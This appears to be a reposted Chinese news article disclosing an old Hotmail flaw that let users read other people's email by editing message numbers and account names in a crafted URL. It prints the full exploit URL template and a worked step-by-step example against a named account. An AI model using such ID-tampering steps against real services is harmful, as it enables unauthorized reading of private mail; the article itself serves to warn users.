Hotmail发现严重安全漏洞

最新推荐文章于 2025-12-22 10:04:10 发布

原创最新推荐文章于 2025-12-22 10:04:10 发布 · 6.2k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#domain #login #工作

近日发现Hotmail邮箱存在漏洞，用户通过更改地址中邮件编号等信息可浏览他人邮件内容，邮件编号规则易猜，完成此操作需2个Hotmail信箱，文中给出了具体操作示例，且该漏洞截至发稿时仍未修复。

近日，一位Hotmail用户发现，通过简单的更改地址中的邮件编号等信
息就可以浏览它人的邮件内容。由于邮件编号都有一定的规则，所以很容
易猜出来。要完成此项工作，你必须拥有2个Hotmail信箱。
　　
　　用于偷看他人邮件的地址为：
　　
　　http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSGXXXXXXXXX% 2e(X)X%26start%3d1% 26len%3d99999999999%26login%
3dUSERNAME%26domain%3dhotmail%2ecom
　　其中XXXXXXXXX为邮件编号，USERNAME为用户账号，(X)X为介于０和59
之间的第二编码。
　　
　　比如说，你有一个名为r00tarded@hotmail.com的信箱。首先登录此信
箱，打开任何一封邮件，此时地址栏中的地址将是：
　　
　　http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=5691b2b4e104176111971aa0fbb1274&msg=MSG998000947.3&start=197078&len=1060&msgread=1&mfs=182

　　这封电子邮件的编号就是MSG998000947.3。把地址拷贝下来，注销。
然后登录另一个信箱。把刚才的那封邮件的编号和账号插入地址栏：
　　
　　http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998000947%2e3%26start%3d1%26len%3d99999999999%26login%
3dr00tarded%26domain%3dhotmail%2ecom
　　回车。看到什么了？对，r00tarded@hotmail.com中的那封邮件的内容
。
　　
　　提请广大Hotmail用户注意，此漏洞到本站发稿时为止仍未修复。（张
永刚）
　　(责编：Cathy)